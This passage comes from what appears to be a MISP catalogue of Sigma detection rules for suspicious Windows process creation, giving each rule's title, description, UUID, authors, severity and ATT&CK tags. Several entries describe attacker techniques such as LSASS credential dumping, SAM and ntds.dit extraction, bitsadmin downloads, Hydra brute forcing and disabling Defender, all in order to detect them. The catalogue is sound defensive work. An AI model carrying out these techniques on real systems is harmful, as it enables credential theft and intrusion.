An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID b52e84a3-029e-4529-b09b-71d19dd27e94 which can be used as unique global reference for Remote Access Tool - AnyDesk Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/11
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_anydesk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Suspicious SYSTEM User Process Creation

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

Internal MISP references

UUID 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 which can be used as unique global reference for Suspicious SYSTEM User Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE (additional keywords)
creation_date 2021/12/20
falsepositive ['Administrative activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity']
filename proc_creation_win_susp_system_user_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1134', 'attack.t1003', 'attack.t1027']

File Encryption/Decryption Via Gpg4win From Suspicious Locations

Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.

Internal MISP references

UUID e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d which can be used as unique global reference for File Encryption/Decryption Via Gpg4win From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/11/30
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate. This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.

Internal MISP references

UUID 41f407b5-3096-44ea-a74f-96d04fbc41be which can be used as unique global reference for Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/08
falsepositive ['Unlikely']
filename proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.initial_access']

Execute From Alternate Data Streams

Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

Internal MISP references

UUID 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c which can be used as unique global reference for Execute From Alternate Data Streams in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/09/01
falsepositive ['Unknown']
filename proc_creation_win_susp_alternate_data_streams.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']

Format.com FileSystem LOLBIN

Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs

Internal MISP references

UUID 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60 which can be used as unique global reference for Format.com FileSystem LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Unknown']
filename proc_creation_win_lolbin_format.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Recon Command Output Piped To Findstr.EXE

Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" flags, for example. Attackers often use this to extract the specific information they require in their chain.

Internal MISP references

UUID ccb5742c-c248-4982-8c5c-5571b9275ad3 which can be used as unique global reference for Recon Command Output Piped To Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/07/06
falsepositive ['Unknown']
filename proc_creation_win_findstr_recon_pipe_output.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1057']

Sensitive File Access Via Volume Shadow Copy Backup

Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)

Internal MISP references

UUID f57f8d16-1f39-4dcb-a604-6c73d9b54b3d which can be used as unique global reference for Sensitive File Access Via Volume Shadow Copy Backup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unlikely']
filename proc_creation_win_susp_sensitive_file_access_shadowcopy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']

Potential Credential Dumping Via LSASS Process Clone

Detects a suspicious LSASS process clone that could be a sign of credential dumping activity

Internal MISP references

UUID c8da0dfd-4ed0-4b68-962d-13c9c884384e which can be used as unique global reference for Potential Credential Dumping Via LSASS Process Clone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Samir Bousseaden
creation_date 2021/11/27
falsepositive ['Unknown']
filename proc_creation_win_lsass_process_clone.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1003.001']

Suspicious Provlaunch.EXE Child Process

Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

Internal MISP references

UUID f9999590-1f94-4a34-a91e-951e47bedefd which can be used as unique global reference for Suspicious Provlaunch.EXE Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/08
falsepositive ['Unknown']
filename proc_creation_win_provlaunch_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

HackTool - Potential Impacket Lateral Movement Activity

Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework

Internal MISP references

UUID 10c14723-61c7-4c75-92ca-9af245723ad2 which can be used as unique global reference for HackTool - Potential Impacket Lateral Movement Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
creation_date 2019/09/03
falsepositive ['Unknown']
filename proc_creation_win_hktl_impacket_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.003']

Winrar Compressing Dump Files

Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Internal MISP references

UUID 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc which can be used as unique global reference for Winrar Compressing Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally', 'Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting']
filename proc_creation_win_winrar_exfil_dmp_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

Registry Modification Via Regini.EXE

Detects the execution of regini.exe, which can be used to modify registry keys; the changes are imported from one or more text files.

Internal MISP references

UUID 5f60740a-f57b-4e76-82a1-15b6ff2cb134 which can be used as unique global reference for Registry Modification Via Regini.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Eli Salem, Sander Wiebing, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate modification of keys']
filename proc_creation_win_regini_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']

Potentially Suspicious CMD Shell Output Redirect

Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.

Internal MISP references

UUID 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 which can be used as unique global reference for Potentially Suspicious CMD Shell Output Redirect in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Legitimate admin or third party scripts used for diagnostic collection might generate some false positives']
filename proc_creation_win_cmd_redirection_susp_folder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Diskshadow Script Mode - Execution From Potential Suspicious Location

Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.

Internal MISP references

UUID fa1a7e52-3d02-435b-81b8-00da14dd66c1 which can be used as unique global reference for Diskshadow Script Mode - Execution From Potential Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/15
falsepositive ['False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fit your org's needs.']
filename proc_creation_win_diskshadow_script_mode_susp_location.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

File Download Via Bitsadmin To An Uncommon Target Folder

Detects usage of bitsadmin downloading a file to an uncommon target folder

Internal MISP references

UUID 6e30c82f-a9f8-4aab-b79c-7c12bce6f248 which can be used as unique global reference for File Download Via Bitsadmin To An Uncommon Target Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']

Suspicious Network Command

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Internal MISP references

UUID a29c1813-ab1f-4dde-b489-330b952e91ae which can be used as unique global reference for Suspicious Network Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2021/12/07
falsepositive ['Administrator, hotline ask to user']
filename proc_creation_win_susp_network_command.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016']

PUA - Potential PE Metadata Tamper Using Rcedit

Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.

Internal MISP references

UUID 0c92f2e6-f08f-4b73-9216-ecb0ca634689 which can be used as unique global reference for PUA - Potential PE Metadata Tamper Using Rcedit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski
creation_date 2022/12/11
falsepositive ['Legitimate use of the tool by administrators or users to update metadata of a binary']
filename proc_creation_win_pua_rcedit_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003', 'attack.t1036', 'attack.t1027.005', 'attack.t1027']

Powershell Defender Disable Scan Feature

Detects requests to disable Microsoft Defender features using PowerShell commands

Internal MISP references

UUID 1ec65a5f-9473-4f12-97da-622044d6df21 which can be used as unique global reference for Powershell Defender Disable Scan Feature in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/03
falsepositive ['Possible administrative activity', 'Other Cmdlets that may use the same parameters']
filename proc_creation_win_powershell_defender_disable_feature.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Binary Proxy Execution Via Dotnet-Trace.EXE

Detects command line arguments for executing a child process via dotnet-trace.exe

Internal MISP references

UUID 9257c05b-4a4a-48e5-a670-b7b073cf401b which can be used as unique global reference for Binary Proxy Execution Via Dotnet-Trace.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jimmy Bayne (@bohops)
creation_date 2024/01/02
falsepositive ['Legitimate usage of the utility in order to debug and trace a program.']
filename proc_creation_win_dotnet_trace_lolbin_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']

Use of Scriptrunner.exe

The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting

Internal MISP references

UUID 64760eef-87f7-4ed3-93fd-655668ea9420 which can be used as unique global reference for Use of Scriptrunner.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/01
falsepositive ['Legitimate use when App-v is deployed']
filename proc_creation_win_lolbin_scriptrunner.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']

Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots, etc.

Internal MISP references

UUID a58353df-af43-4753-bad0-cd83ef35eef5 which can be used as unique global reference for Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/14
falsepositive ['Legitimate usage to restore snapshots', 'Legitimate admin activity']
filename proc_creation_win_ntdsutil_susp_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE

Detects usage of cmdkey to look for cached credentials on the system

Internal MISP references

UUID 07f8bdc2-c9b3-472a-9817-5a670b872f53 which can be used as unique global reference for Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Legitimate administrative tasks']
filename proc_creation_win_cmdkey_recon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.005']

Suspicious WMIC Execution Via Office Process

Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).

Internal MISP references

UUID e1693bc8-7168-4eab-8718-cdcaa68a1738 which can be used as unique global reference for Suspicious WMIC Execution Via Office Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov, Cyb3rEng
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_wmic_susp_execution_via_office_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1204.002', 'attack.t1047', 'attack.t1218.010', 'attack.execution', 'attack.defense_evasion']

File Download Via Bitsadmin To A Suspicious Target Folder

Detects usage of bitsadmin downloading a file to a suspicious target folder

Internal MISP references

UUID 2ddef153-167b-4e89-86b6-757a9e65dcac which can be used as unique global reference for File Download Via Bitsadmin To A Suspicious Target Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_susp_targetfolder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']

MsiExec Web Install

Detects suspicious msiexec process starts with web addresses as a parameter

Internal MISP references

UUID f7b5f842-a6af-4da5-9e95-e32478f3cd2f which can be used as unique global reference for MsiExec Web Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/02/09
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_msiexec_web_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007', 'attack.command_and_control', 'attack.t1105']

Suspicious PowerShell Invocation From Script Engines

Detects suspicious powershell invocations from interpreters or unusual programs

Internal MISP references

UUID 95eadcb2-92e4-4ed1-9031-92547773a6db which can be used as unique global reference for Suspicious PowerShell Invocation From Script Engines in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Microsoft Operations Manager (MOM)', 'Other scripts']
filename proc_creation_win_powershell_script_engine_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Suspicious Invoke-WebRequest Execution With DirectIP

Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access

Internal MISP references

UUID 1edff897-9146-48d2-9066-52e8d8f80a2f which can be used as unique global reference for Suspicious Invoke-WebRequest Execution With DirectIP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/21
falsepositive ['Unknown']
filename proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Potential Persistence Via Netsh Helper DLL

Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.

Internal MISP references

UUID 56321594-9087-49d9-bf10-524fe8479452 which can be used as unique global reference for Potential Persistence Via Netsh Helper DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename proc_creation_win_netsh_helper_dll_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.007', 'attack.s0108']

PUA - PingCastle Execution

Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.

Internal MISP references

UUID b1cb4ab6-ac31-43f4-adf1-d9d08957419c which can be used as unique global reference for PUA - PingCastle Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2024/01/11
falsepositive ['Unknown']
filename proc_creation_win_pua_pingcastle.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1595']

File With Suspicious Extension Downloaded Via Bitsadmin

Detects usage of bitsadmin downloading a file with a suspicious extension

Internal MISP references

UUID 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200 which can be used as unique global reference for File With Suspicious Extension Downloaded Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']

Potential Adplus.EXE Abuse

Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.

Internal MISP references

UUID 2f869d59-7f6a-4931-992c-cce556ff2d53 which can be used as unique global reference for Potential Adplus.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/09
falsepositive ['Legitimate usage of Adplus for debugging purposes']
filename proc_creation_win_adplus_memory_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1003.001']

Conhost Spawned By Uncommon Parent Process

Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

Internal MISP references

UUID cbb9e3d1-2386-4e59-912e-62f1484f7a89 which can be used as unique global reference for Conhost Spawned By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/28
falsepositive ['Unknown']
filename proc_creation_win_conhost_uncommon_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Potential SPN Enumeration Via Setspn.EXE

Detects service principal name (SPN) enumeration used for Kerberoasting

Internal MISP references

UUID 1eeed653-dbc8-4187-ad0c-eeebb20e6599 which can be used as unique global reference for Potential SPN Enumeration Via Setspn.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, keepwatch
creation_date 2018/11/14
falsepositive ['Administration activity']
filename proc_creation_win_setspn_spn_enumeration.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']

Execution Of Non-Existing File

Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

Internal MISP references

UUID 71158e3f-df67-472b-930e-7d287acaa3e1 which can be used as unique global reference for Execution Of Non-Existing File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/12/09
falsepositive ['Unknown']
filename proc_creation_win_susp_image_missing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Processes Spawned by WinRM

Detects suspicious processes, including shells, spawned from the WinRM host process

Internal MISP references

UUID 5cc2cda8-f261-4d88-a2de-e9e193c86716 which can be used as unique global reference for Suspicious Processes Spawned by WinRM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), Markus Neis
creation_date 2021/05/20
falsepositive ['Legitimate WinRM usage']
filename proc_creation_win_winrm_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1190', 'attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

New User Created Via Net.EXE With Never Expire Option

Detects creation of local users via the net.exe command with the option "never expire"

Internal MISP references

UUID b9f0e6f5-09b4-4358-bae4-08408705bd5c which can be used as unique global reference for New User Created Via Net.EXE With Never Expire Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unlikely']
filename proc_creation_win_net_user_add_never_expire.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Forfiles.EXE Child Process Masquerading

Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.

Internal MISP references

UUID f53714ec-5077-420e-ad20-907ff9bb2958 which can be used as unique global reference for Forfiles.EXE Child Process Masquerading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Anish Bogati
creation_date 2024/01/05
falsepositive ['Unknown']
filename proc_creation_win_forfiles_child_process_masquerading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Suspicious Cabinet File Execution Via Msdt.EXE

Detects execution of msdt.exe using the "cab" flag, which could indicate suspicious diagcab files with embedded answer files leveraging CVE-2022-30190

Internal MISP references

UUID dc4576d4-7467-424f-9eee-fd2b02855fe0 which can be used as unique global reference for Suspicious Cabinet File Execution Via Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
creation_date 2022/06/21
falsepositive ['Legitimate usage of ".diagcab" files']
filename proc_creation_win_msdt_susp_cab_options.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

HackTool - Hydra Password Bruteforce Execution

Detects command line parameters used by Hydra password guessing hack tool

Internal MISP references

UUID aaafa146-074c-11eb-adc1-0242ac120002 which can be used as unique global reference for HackTool - Hydra Password Bruteforce Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vasiliy Burov
creation_date 2020/10/05
falsepositive ['Software that uses the caret encased keywords PASS and USER in its command line']
filename proc_creation_win_hktl_hydra.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1110', 'attack.t1110.001']
Related clusters

To see the related clusters, click here.

Potential Configuration And Service Reconnaissance Via Reg.EXE

Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.

Internal MISP references

UUID 970007b7-ce32-49d0-a4a4-fbef016950bd which can be used as unique global reference for Potential Configuration And Service Reconnaissance Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Discord']
filename proc_creation_win_reg_query_registry.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1012', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Remote XSL Execution Via Msxsl.EXE

Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.

Internal MISP references

UUID 75d0a94e-6252-448d-a7be-d953dff527bb which can be used as unique global reference for Remote XSL Execution Via Msxsl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Msxsl is not installed by default and is deprecated, so unlikely on most systems.']
filename proc_creation_win_msxsl_remote_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']
Related clusters

To see the related clusters, click here.

Suspicious Program Names

Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools

Internal MISP references

UUID efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6 which can be used as unique global reference for Suspicious Program Names in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/11
falsepositive ['Legitimate tools that accidentally match on the searched patterns']
filename proc_creation_win_susp_progname.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

HackTool - Dumpert Process Dumper Execution

Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

Internal MISP references

UUID 2704ab9e-afe2-4854-a3b1-0c0706d03578 which can be used as unique global reference for HackTool - Dumpert Process Dumper Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/02/04
falsepositive ['Very unlikely']
filename proc_creation_win_hktl_dumpert.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

HTML Help HH.EXE Suspicious Child Process

Detects a suspicious child process of Microsoft HTML Help (HH.exe)

Internal MISP references

UUID 52cad028-0ff0-4854-8f67-d25dfcbc78b4 which can be used as unique global reference for HTML Help HH.EXE Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/04/01
falsepositive ['Unknown']
filename proc_creation_win_hh_html_help_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.initial_access', 'attack.t1047', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218', 'attack.t1218.001', 'attack.t1218.010', 'attack.t1218.011', 'attack.t1566', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Security Privileges Enumeration Via Whoami.EXE

Detects whoami.exe executed with the /priv command line flag, instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.

Internal MISP references

UUID 97a80ec7-0e2f-4d05-9ef4-65760e634f6b which can be used as unique global reference for Security Privileges Enumeration Via Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/05
falsepositive ['Unknown']
filename proc_creation_win_whoami_priv_discovery.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Enable LM Hash Storage - ProcCreation

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

Internal MISP references

UUID 98dedfdd-8333-49d4-9f23-d7018cccae53 which can be used as unique global reference for Enable LM Hash Storage - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/15
falsepositive ['Unknown']
filename proc_creation_win_reg_nolmhash.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Reg Add Open Command

Threat actors performed dumping of the SAM, SECURITY and SYSTEM registry hives using the DelegateExecute key

Internal MISP references

UUID dd3ee8cc-f751-41c9-ba53-5a32ed47e563 which can be used as unique global reference for Suspicious Reg Add Open Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
